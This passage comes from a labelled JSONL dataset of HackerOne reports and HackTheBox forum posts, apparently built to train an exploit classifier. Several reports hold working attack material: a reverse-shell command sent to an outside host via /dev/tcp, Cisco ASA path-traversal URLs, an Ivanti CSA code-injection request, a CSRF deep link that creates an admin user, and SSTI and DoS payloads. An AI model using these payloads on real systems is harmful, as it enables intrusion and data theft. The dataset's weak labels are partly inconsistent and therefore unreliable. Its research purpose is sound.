pwd\n/home/pathtraversal/\n$ node --experimental-permission --allow-fs-read=\"/home/pathtraversal/*\" --allow-fs-write=\"/home/pathtraversal/*\" index.js\n```\n\n`/home/test0` will be created bypassing the permission model validation\n\n## Impact\n\nAll the methods exposed by the process.binding('fs') could eventually bypass the permission model using path traversal. It will require the attacker to read the node_file.cc implementation, but that's trivial.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8b1416032608cb6fb796", "text": "[Information Exposure Through Debug Information] Information disclosure through django debug mode\n\n## Summary:\nYour domain https://szezvzorilla.mtn.co.sz was disclosing information throught django debug mode enable.\n\n## Steps To Reproduce:\nVisit https://szezvzorilla.mtn.co.sz/NON_EXISTING_PATH/\nYou will the information of debugging\n\n\n## Supporting Material/References:\n{F1555934}\n * [attachment / reference]\n\n## Impact\n\nInformation disclosure", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-05", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "01ec083130b73292be8a", "text": "[Cross-Site Request Forgery (CSRF)] CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link\n\n## Summary\nIt is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)\n\nThis vulnerability was introduced in an attempt to fix #1720043. The patch however can be bypassed and also introduced a CSRF vulnerability.\n\n## Steps To Reproduce:\nThe following reproduction steps send a OCS API request to the `/ocs/v1.php/cloud/users` endpoint with the following post body: `path=/.\\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&email=mail@example.com&groups[]=admin&\\..\\.owncloudsync.log`. If the victim is not an administrator, one would need to target another controller.\n\n 1. Open the following deeplink on a Windows machine with the Nextcloud Desktop Client installed. Make sure to adjust the victim username and instance URL: `nc://open/admin@pentest.cloud.wtf/.\\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&email=mail@example.com&groups[]=admin&\\..\\.owncloudsync.log?token=../../../../../../../ocs/v1.php/cloud/users`\n 1. Verify that a user called \"hacker\" is created on the instance and added to the admin group.\n\n## Root cause\n\nThe attempt to fix #1720043 was done with https://github.com/nextcloud/desktop/pull/5055 and introduced the [following code](https://github.com/nextcloud/desktop/blob/2f6b56748a4f6a4097a1e11c147d4fd71db993d4/src/gui/folderman.cpp#L1498-L1500):\n\n```cpp\n const auto checkTokenForEditLocally = new SimpleApiJob(accountFound->account(), QStringLiteral(\"/ocs/v2.php/apps/files/api/v1/openlocaleditor/%1\").arg(token));\n checkTokenForEditLocally->setVerb(SimpleApiJob::Verb::Post);\n checkTokenForEditLocally->setBody(QByteArray{\"path=/\"}.append(relPath.toUtf8()));\n```\n\nThere are two vulnerabilities here that can be chained together:\n\n- **Token is not encoded**:`token` is concatenated directly into the URL and not properly encoded. Passing a `token` such like `?token=../../../../../../../ocs/v1.php/cloud/users` will make the request therefore go to `/ocs/v2.php/apps/files/api/v1/openlocaleditor/../../../../../../../ocs/v1.php/cloud/users` which means `/ocs/v1.php/cloud/users`.\n- **Relative file path is not encoded**: `relPath` is concatenated directly into the POST body and not properly encoded. Passing a path such as `.\\&userid=hacker&password=h4ck3rPassw0Rd!&displayName=hacker&email=mail@example.com&groups[]=admin&\\..\\.owncloudsync.log` will therefore create several request POST parameters. (Note: `./owncloudsync.log` is a default file which I use here to ensure the file exists check earlier in the code works)\n\n## Supporting Material/References:\n\n- Screenshot of the request: F1992646\n- Screenshot of the created user: F1992654\n\n\n## Disclosure Policy\nPlease note that all bugs reported by [Authentick GmbH](https://www.authentick.net/) will be publicly disclosed within 90 days of vendor notification. In extraordinary cases we may increase that upon request by the vendor.\n\n## Impact\n\nIt is possible to make a user send any POST request with an arbitrary body given they click on a malicious deep link. (e.g. in an email, chat link, etc)", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e78ec04d13f6a9c9c0d2", "text": "[Improper Access Control - Generic] LDAP anonymous access enabled at certrep.pki.state.gov:389\n\n## Summary:\nHi us-department-of-state Security Team.\n\nI have found that this subdomain certrep.pki.state.gov Is vulnerable LDAP Anonymous access enabled as you can see in the following screenshots:-\n\n██████████\n\n███████\n\n████████\n\n## Steps To Reproduce:\n1. Run nmap -n -Pn --script \"ldap* and not brute\" certrep.pki.state.gov\n2. You can use ldapadmin tool as showing above at screenshots.\n\n## Supporting Material/References:\n- https://book.hacktricks.xyz/network-services-pentesting/pentesting-ldap\n- https://hackerone.com/reports/205908\n\nPlease let me know if need more info.\nBest Regards.\n@doosec101\n\n## Impact\n\nImproper access to LDAP with anonymous login.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "139932f6be517ae82c83", "text": "[Cross-site Scripting (XSS) - Generic] Possible XSS vulnerability without a content security bypass\n\n## Summary:\nHi security team members,\n\nHope you are well and doing great :)\n\nI found a **Possible XSS vulnerability in https://dashboard.stripe.com but I was not able to bypass a content security policy.**\n\nAlthough, I don't have much knowledge about CSP and its bypasses. But, I read that you accept the XSS without a content security bypass. So, I'm reporting this to you.\n> Please note that we do accept and reward submissions for valid cross-site scripting vulnerabilities even if they are not accompanied by a bypass of our content security policy. Cross-site scripting vulnerabilities without a content security bypass will be assessed at a lower severity level than those with a bypass.\n\n## Description:\nThis occurs when you create a `custom link` with the `javascript://%0aalert(1)` through a [stripe app](https://marketplace.stripe.com/apps/custom-links). And, It gives a **CSP refused executing error** on clicking the custom link.\n\n## Steps To Reproduce:\n1. Install this `Custom Link` app:- https://marketplace.stripe.com/apps/custom-links\n2. Now, Go to your products and then create a `Custom Link` with this `javascript://%0aalert(1)` as a link\n{F2076228}\n\n3. Then, Once you click on the custom link that you just created. It will doesn't execute because of CSP.\n{F2076226}\n4. You can verify this by opening your `Console`.\n\n## Video POC:\n{F2076227}\n\n## Impact\n\nIf an attacker is able to bypass CSP then there is a possible XSS vulnerability in https://dashboard.stripe.com,.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-05-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "8823ae1033c2f8ecc509", "text": "the challenge says: We are given the IP address of an online academy but have no further information about their website. As the first step of conducting a Penetration Testing engagement, we have to determine whether any weak credentials are used across the website and other login services. Look beyond just default/common passwords. Use the skills learned in this module to gather information about employees we identified to create custom wordlists to attack their accounts. Attack the web application and submit two flags using the skills we covered in the module sections and submit them to complete this module. How will I know that they talk about Harry Potter, is that I have a crystal ball, These reots should improve the context,I know it’s about Harry because I’ve read it on the forum but I don’t know when it would have occurred to me that it was about Howards Academy", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-01-02", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "309d92d44a9de0d7053e", "text": "Just looked through the code and it looks like there’s a really cool story behind this tool I hope to see a more compliant post with a general dev walkthrough about it sometime!", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "zerosec", "timestamp": "2022-01-20", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "567f0be793d13779989f", "text": "[Improper Authentication - Generic] Broken access control\n\n## Summary:\nhello ups team ,,,\nI've found broken access control vulnerability in your sites \nIt allows me to access the admin panel of the support team, and I can view all requests within the site\n\nvulnerable domains:**connectnb.ups.com**\n## Steps To Reproduce:\n[add details for how we can reproduce the issue]\n\n 1. go to **connectnb.ups.com** \n 2. go to **https://connectnb.ups.com/Layout/forgotPassword** ,put any email address and intercept the request\n \n```\nPOST /api/Account/SendTempPassword/?userName=admin@admin.com HTTP/2\nHost: connectnb.ups.com\nCookie: __RequestVerificationToken=ZSZXAd3wrj6GSWF1seZAIWIUPQiK4spv-xbaxR_3HxFgJnaSGKr7xXlb9iHYEUQVloknAoTtK5DmWtjdP7yVT7MQ6Z2JW3d5kK2qoxDAbas1\nContent-Length: 0\nSec-Ch-Ua: \" Not A;Brand\";v=\"99\", \"Chromium\";v=\"99\", \"Google Chrome\";v=\"99\"\nAccept: application/json, text/plain, */*\nSec-Ch-Ua-Mobile: ?0\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.82 Safari/537.36\nSec-Ch-Ua-Platform: \"Linux\"\nOrigin: https://connectnb.ups.com\nSec-Fetch-Site: same-origin\nSec-Fetch-Mode: cors\nSec-Fetch-Dest: empty\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8,ar;q=0.7\n\n\n```\n 3.On the burp site, intercept the response for this request and change this value to \nThen change the **\"status\"** value of this request from false to true\n\n##response:\n\n```\nHTTP/2 200 OK\nCache-Control: no-cache,no-cache,no-store\nPragma: no-cache,no-cache\nContent-Type: application/json; charset=utf-8\nExpires: -1\nServer: \nX-Content-Type-Options: nosniff\nX-Xss-Protection: 1; mode=block\nReferrer-Policy: no-referrer\nStrict-Transport-Security: max-age=31536000; includeSubDomains;preload\nX-Frame-Options: DENY\nX-Ua-Compatible: IE=Edge\nContent-Security-Policy: script-src 'self'; object-src 'self'; frame-ancestors 'none'\nExpect-Ct: enforce, max-age=7776000, report-uri='https://connectnb.ups.com/'\nAccess-Control-Allow-Headers: Accept, Content-Type, Origin\nAccess-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS\nDate: Wed, 13 Apr 2022 05:09:59 GMT\nContent-Length: 89\n\n{\"status\":true,\"errorMessage\":\"Username does not exist. Please enter correct Username.\"}\n```\n\n 4. After that, go to this path **/resetPassword** You will notice that this page has been opened without problems\n\n{F1690903}\n\nGo to user or report and you will notice that it opens normally and you can fully control it\n\nI made a video of the vulnerability that you can watch\n\n##video POC:\n\n{F1690906}\n\n## Impact\n\nThe attacker can hack the admin control panel and view and modify all reports", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "d5c2628e2d26c42cc166", "text": "[Path Traversal] [CVE-2020-3452] Unauthenticated file read in Cisco ASA\n\ni found out that https://█████/ was vulnerable to CVE-2020-3452\n\nThe IP has a SSL certificate pointing to ██████████\ncurl -kv https://███████/\n\nOutput;\n```\nServer certificate:\n███\n```\n\n## Impact\n\nAnyone can read any file present on the server.\n\n## System Host(s)\n█████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nYou can test it by visiting the URL:\n1. https://█████████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n2. https://█████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\n## Suggested Mitigation/Remediation Actions\nhttps://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "ffb6571de665d6781aa0", "text": "[Improper Removal of Sensitive Information Before Storage or Transfer] the complete server installation path is visible in cloud/user endpoint\n\nhttps://github.com/nextcloud/server/issues/33883\n\n\nWhen doing a GET request on `/ocs/v1.php/cloud/user?format=json` the server returns user data, including one containing the full local server path:\n\n```\n \"storageLocation\": \"/home/bohwaz/www/tmp/nextcloud/data/bohwaz\",\n```\n\nThis is not a big security issue (as you need to be logged-in to get that response), but this is data that an attacker shouldn't be able to know easily.\n\nThis happens on a brand new install after using the web installer.\n\n## Impact\n\nSensitive internal info", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-03-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "88c4a93b0739c64ab301", "text": "[Information Disclosure] An attacker can can view any hacker email via /SaveCollaboratorsMutation operation name\n\n**Summary:**\n\nAn attacker can view any attacker or normal user email after send invitation via dummy report , disclose their private email.\n \n**Description:**\n\n### Steps To Reproduce\n\n1 - Create a dummy report and send it\n2 - Add a hacker that you want to disclose his email , Max is only 2 invites per report\n3 - send the invite after sending the invite the hacker will be pending status until accept the report .\n4- Go the pen on the right for adding more collaborator and click on the pen and capture traffic , you will see the user email in first request,\neven that the user not accept the invitation yet \n\nHTTP Request : \n```\nPOST /graphql HTTP/2\nHost: hackerone.com\n\n[sinp]\n\n{\"operationName\":\"SaveCollaboratorsMutation\",\"variables\":{\"input\":{\"report_id\":2032701,\"collaborators\":[{\"username_or_email\":\"testmealways\",\"bounty_weight\":0.9989999999999999},{\"username_or_email\":\"███████\",\"bounty_weight\":0.9989999999999999},{\"username_or_email\":\"███████\",\"bounty_weight\":0.9989999999999999}]},\"product_area\":\"collaboration\",\"product_feature\":\"save_collaborators\"},\"query\":\"mutation SaveCollaboratorsMutation($input: SaveCollaboratorsMutationInput!) {\\n saveCollaborators(input: $input) {\\n was_successful\\n errors {\\n edges {\\n node {\\n message\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n __typename\\n }\\n}\\n\"}\n\n````\n\nExample :\n\nHere is email for todayisnew , Hacker 1 rank in H1 :\n\n```\n████████\n\n```\n\n\nVideo PoC :\n\n████████\n\n## Impact\n\nAn attacker can view any user's email registered with Hackerone as hacker .", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-07-04", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "b5679a1920e087dac4fc", "text": "I figured it out) Brought it to full screen and saw an icon in the lower right corner. It was not displayed in normal mode.( HTB Academy 277×174 38.6 KB That’s just through pwnbox, the error is the same as on my VM, unfortunately. What am I doing wrong? The advice was to run the script on pwnbox. strangely error_HTB Academy 758×387 143 KB", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-06-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fb3f33f4a214a49b03e9", "text": "[SQL Injection] SQL injextion via vulnerable doctrine/dbal version\n\n## Summary:\nSQL injection via limit parameter on user facing APIs\n\n## Steps To Reproduce:\nRun security scanner:\n\n 1. REPORT /remote.php/dav/comments/files/1985\n 1. XML input oc:filter-comments.oc:limit#text was set to 1'\"\n 1. You have an error in your SQL syntax\n\n## Supporting Material/References:\nFor more details see:\nhttps://github.com/nextcloud-gmbh/h1/issues/197\n\n## Impact\n\nFull flexed SQL injection via user provided input", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-05-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "edb750155b19ffa863c8", "text": "[Uncontrolled Resource Consumption] Possible DOS in app with crashing `exceptions_app`\n\nMake a new Rails app, add the `lograge` gem.\n\n```ruby\n# config/application.rb\nconfig.exceptions_app = self.routes\nconfig.lograge.enabled = true\n```\n\n```ruby\n# config/routes.rb\n\nRails.application.routes.draw do\n root to: \"site#index\"\n\n get 'errors/not_found'\n match \"/404\", to: \"errors#not_found\", via: :all\nend\n```\n\n```ruby\n# app/controllers/errors_controller.rb\n\nclass ErrorsController < ApplicationController\n def not_found\n render status: 404 # the view can do whatever, it doesn't matter\n end\nend\n```\n\nStart the server as a production app (eg. it would start on Heroku): `RAILS_ENV=production RACK_ENV=production SECRET_KEY_BASE=foo RAILS_SERVE_STATIC_FILES=enabled RAILS_MAX_THREADS=2 RAILS_LOG_TO_STDOUT=enabled rails s`\n\nRun this script:\n\n```ruby\n1000.times.each do |n|\n `curl -H \"Accept: application/xml\" -H \"Content-Type: application/xml\" -X GET http://localhost:3000///wp1/wp-includes/wlwmanifest.xml`\nend\n```\n\nAt some point (after 989 requests for me), Puma will crash:\n\n```\n2021-08-11 13:23:04 -0500 Rack app (\"GET ///wp1/wp-includes/wlwmanifest.xml\" - (127.0.0.1)): #\n```\n\nSince it's a fatal Ruby error (which is unrecoverable) this leaves Puma in a zombie state, similar to https://github.com/puma/puma/issues/2552\n\nThe reason this crashes is:\n\n- [ActionDispatch::ShowExceptions](https://github.com/rails/rails/blob/main/actionpack/lib/action_dispatch/middleware/show_exceptions.rb#L55) returns a non-frozen const.\n- [lograge](https://github.com/roidrage/lograge/blob/master/lib/lograge/rails_ext/rack/logger.rb#L15) doesn't wrap this response in a `Rack::BodyProxy`. If you weren't using lograge, then Rails would do so [here](https://github.com/rails/rails/blob/main/railties/lib/rails/rack/logger.rb#L37). Before realising this could be a Rails security vulnerability, I made a PR for this here: https://github.com/roidrage/lograge/pull/333\n- [RequestStore](https://github.com/steveklabnik/request_store/blob/master/lib/request_store/middleware.rb#L21) mutates the response body. This causes the const in Rails to get mutated, it now is a `Rack::BodyProxy` with a reference to itself. Every time it gets returned, it gets mutated again and the object gets one layer bigger. Before realising this could be a Rails security vulnerability, I made a PR for the mutation here: https://github.com/steveklabnik/request_store/pull/78\n- Eventually, we have an extremely large `Rack::BodyProxy` that references itself hundreds of times in memory. This is easy to make crash. In our case, [Rack::Sendfile](https://github.com/rack/rack/blob/master/lib/rack/sendfile.rb#L113) causes a `SystemStackError`, I think this happens because of how `BodyProxy` handles `respond_to_missing?`.\n\nI don't think this issue is unique to `lograge` + `RequestStore`. It can happen anywhere you have:\n\n- A middleware that mutates a response, and\n- `FAILSAFE_RESPONSE` (or another non-frozen const) being passed to that middleware, and\n- Something higher in the middleware stack that calls a missing method on the response.\n\nI was about to make a PR to Rails with this patch when it dawned on me that this could be a security issue:\n\n```diff\ndiff --git a/actionpack/lib/action_dispatch/middleware/show_exceptions.rb b/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\nindex 0a7e895e59..d207765acc 100644\n--- a/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\n+++ b/actionpack/lib/action_dispatch/middleware/show_exceptions.rb\n@@ -14,13 +14,14 @@ module ActionDispatch\n # If the application returns a \"X-Cascade\" pass response, this middleware\n # will send an empty response as result with the correct status code.\n # If any exception happens inside the exceptions app, this middleware\n- # catches the exceptions and returns a FAILSAFE_RESPONSE.\n+ # catches the exceptions and returns a failsafe response.\n class ShowExceptions\n FAILSAFE_RESPONSE = [500, { \"Content-Type\" => \"text/plain\" },\n [\"500 Internal Server Error\\", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-06-28", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fcb3bb13d6644ed780a4", "text": "I thought the ${LS_COLORS:10:1} would come from the printenv command and would assume the ; caracter. I have reached the injection point, i can already see the whoami and ls o’u’t’pu’ts but i cant cat the file.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-07-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "4191b505d4fcb59d63e6", "text": "[Path Traversal] CVE-2020-3452 on https://█████/\n\nHello team,\nI hope you're doing well, healthy & wealthy.\n\nI found a CVE-2020-3452 path traversal and here is the explanation.\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n## References\n\n - https://twitter.com/aboul3la/status/1286012324722155525\n - http://packetstormsecurity.com/files/158646/Cisco-ASA-FTD-Remote-File-Disclosure.html\n - http://packetstormsecurity.com/files/158647/Cisco-Adaptive-Security-Appliance-Software-9.11-Local-File-Inclusion.html\n - http://packetstormsecurity.com/files/159523/Cisco-ASA-FTD-9.6.4.42-Path-Traversal.html\n - http://packetstormsecurity.com/files/160497/Cisco-ASA-9.14.1.10-FTD-6.6.0.1-Path-Traversal.html\n - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-ro-path-KJuQhB86\n\n## Impact\n\nA vulnerability in the web services interface of Cisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to conduct directory traversal attacks and read sensitive files on a targeted system. The vulnerability is due to a lack of proper input validation of URLs in HTTP requests processed by an affected device. An attacker could exploit this vulnerability by sending a crafted HTTP request containing directory traversal character sequences to an affected device. A successful exploit could allow the attacker to view arbitrary files within the web services file system on the targeted device. The web services file system is enabled when the affected device is configured with either WebVPN or AnyConnect features. This vulnerability cannot be used to obtain access to ASA or FTD system files or underlying operating system (OS) files.\n\n ** classification:**\n- cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n- cvss-score: 7.50\n\n## System Host(s)\n█████████\n\n## Affected Product(s) and Version(s)\nCisco Adaptive Security Appliance (ASA) Software and Cisco Firepower Threat Defense (FTD) Software\n\n## CVE Numbers\nCVE-2020-3452\n\n## Steps to Reproduce\nPlease do this GET request below.\n\n- https://████████/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../\n\nSecond attack type:\n\n- https://██████/+CSCOT+/oem-customization?app=AnyConnect&type=oem&platform=..&resource-type=..&name=%2bCSCOE%2b/portal_inc.lua\n\nYou can see the file can be downloaded.\n\n## Suggested Mitigation/Remediation Actions\nPlease upgrade to the latest version of the software.\n\nBest regards.\n@pirneci", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2020-3452"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-18", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "bec1b53c02727646a2a5", "text": "[Code Injection] Server Side Template Injection on Name parameter during Sign Up process\n\n## Summary:\nServer-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side. \nIn this scenario, when an attacker signs up on the platform and uses a payload in the **First Name** field, the payload is rendered server side and it gets executed in the promotional/welcome emails sent to the user\n\n## Steps To Reproduce:\nStep 1: Navigate to [Glovoapp] (https://www.glovoapp.com/kg/en/bishkek/) and click on **Register**\nStep 2: Now, in the ```First Name``` field, enter the value ```{{7*7}}```\n\n{F1197322}\n\n\nStep 3: Fill in the rest of the values on the Register page and register your account.\n\n{F1197320}\n\n\nStep 4: We have used the payload ```{{7*7}}``` here to verify that it is being evaluated at the backend\nStep 5: Now, wait for the welcome/promotional email to arrive in your Inbox\nStep 6: Notice that the email arrives with the Subject as ```49, welcome to Glovo!```\n\n{F1197321}\n\n\nStep 7: The attacker can now further exploit this issue by injecting malicious payloads in the Name field and gathering sensitive information from the application.\n\n\nNote- After carrying out this attack, I didn't receive any welcome email for my other account maybe because the code broke.\n\n## Impact\n\nTemplate engines are widely used by web applications to present dynamic data via web pages and emails. Unsafely embedding user input in templates enables Server-Side Template Injection, which can be used to directly attack web servers' internals and often obtain Remote Code Execution (RCE), turning every vulnerable application into a potential pivot point.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-11", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "309908af3145898ef411", "text": "[Deserialization of Untrusted Data] Kafka Connect RCE via connector SASL JAAS JndiLoginModule configuration\n\n## Summary:\nWhen configuring the connector via the Aiven API or the Kafka Connect REST API, the attacker can set the `database.history.producer.sasl.jaas.config` connector property for the `io.debezium.connector.mysql.MySqlConnector` connector. This is likely true for other debezium connectors too. By setting the connector value to `\"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://attacker_server\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";\"`, the server will connect to the attacker's LDAP server and it deserializes the LDAP response, which the attacker can use to execute java deserialization gadget chains on the kafka connect server.\n\n## Steps To Reproduce:\n██████\n\n 1. Login into my VPS: `ssh ███████`, password: `█████`\n 1. Execute `java -jar RogueJndi-1.1.jar --hostname ███ -c \"bash -c bash\\${IFS}-i\\${IFS}>&/dev/tcp/███/4445<&1\"`\n 1. Execute `nc -nlvp 4445` on another tab\n 1. Execute `python3 poc.py` on another table. This poc script launches the exploit against my Aiven kafka connect instance.\n 1. Reverse shell connection should now be established\n\n\n## The gadget chain\n\nThe exploit uses `System.setProperty` gadget chain in the scala standard library to enable unsafe deserialization of apache commons collections transformers (finding this gadget chain took way too much time...). This payload has been designed for the Scala version 2.13.6. It may fail on other scala versions. Then the script executes the reverse shell setup command using the [CommonsCollections7](https://github.com/frohoff/ysoserial/blob/master/src/main/java/ysoserial/payloads/CommonsCollections7.java) payload.\n\n## Impact\n\nAttacker can execute commands on the server and access other resources on the network.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-11-08", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "c285e2e4702de7a4f6ee", "text": "Regarding global rank\n\nhey, i completed 2 machines in hackthebox and owned them and also completed 1 or 2 challanges why my global ranking is not increasing? its still 0", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "1d618106d104e1f6325a", "text": "[Improper Authentication - Generic] Bypass For #997350 your-store.myshopify.com preview link is leak on third party website Via Online Store\n\nHi Security Team,\n\n#Description\nFull Description in #997350 \n\n\nThe owner of that website can perform a security compromise by grabbing those links.\n\n#Solution:\nThe solution is very very SIMPLE. Just include the following HTML code in the following in code between tags of the html of the page: \nThis will not send referrer headers to third party websites.\n\n#Reproduction Instructions /\n1)Open your Store & add social media Links.\n2)Click F1045363. \n3)Now turn burp suite intercept on and click on Click on any social media link(on follow us section). Check for the requests having the Link in Referrer as third party website. And copy the Link.\n4)Now turn intercept off and Open Link.(with that token) in other tab,browser or PC.\n5)Now you you sucesfully catch/preview all action in your-store.myshopify.com from store owner without store password.\n\n>Preview all action/Login\n\n#Proof of Concept\nF1045355\nF1045356\nF1045357\nF1045358\nF1045359\nF1045360\n\n#Additional Information:\nNote also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.\n\n## Impact\n\nAs you can see in the Referrer preview Link is getting leaked to third party sites. So, the person who has the complete control over that particular third party site can Use the Link to preview all action in your-store.myshopify.com from store owner without store password.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-10", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "401dd6e922aadb1e0e8d", "text": "[Code Injection] [███████] Remote Code Execution at ██████ [CVE-2021-44529] [HtUS]\n\n**IP Address used to find vulnerability:**\n\n `██████`\n\n**Vulnerable Website URL or Application:** \n\n`https://████`\n\n`pomcldsvr2.████`\n\n\n\n**Proof of ownership:**\n\n███\n\n\n\n**Summary:**\n\nThe server at `https://███` is running a vulnerable version of CSA.\n\nA code injection vulnerability in the Ivanti EPM Cloud Services Appliance (CSA) allows an unauthenticated user to execute arbitrary code with limited permissions (nobody).\n\n**Steps to Reproduce:**\n\nUse Burp Repeater to send the following GET requests:\n\n*Please note that for the system commands to run, they need to be Base64 encoded. For example, for phpinfo, pass cGhwaW5mbygpOw==*\n\n- For phpinfo()\n\n ````\n GET /client/index.php HTTP/1.1\n Host: ███████\n User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36\n Connection: close\n Cookie: ab=ab; c=cGhwaW5mbygpOw==; d=; e=;\n Accept-Encoding: gzip, deflate\n \n \n ````\n\n**Screenshots:**\n\n█████████\n\n█████████\n\n██████\n\n█████\n\n██████\n\n**References:**\n\n- https://nvd.nist.gov/vuln/detail/CVE-2021-44529\n- https://forums.ivanti.com/s/article/SA-2021-12-02\n\n## Impact\n\n**Impact:**\nRemote attackers can execute arbitrary commands on the server, and compromise company and user data.\n\n**CVSS Score: Critical**\n\n**Vector:** CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2021-44529"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "607804b5ea1b2cd4e8a0", "text": "Can anyone write to me privately please. I have a question about the optional task and would like to understand it. I have all 5 flags, for info.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-08-12", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": 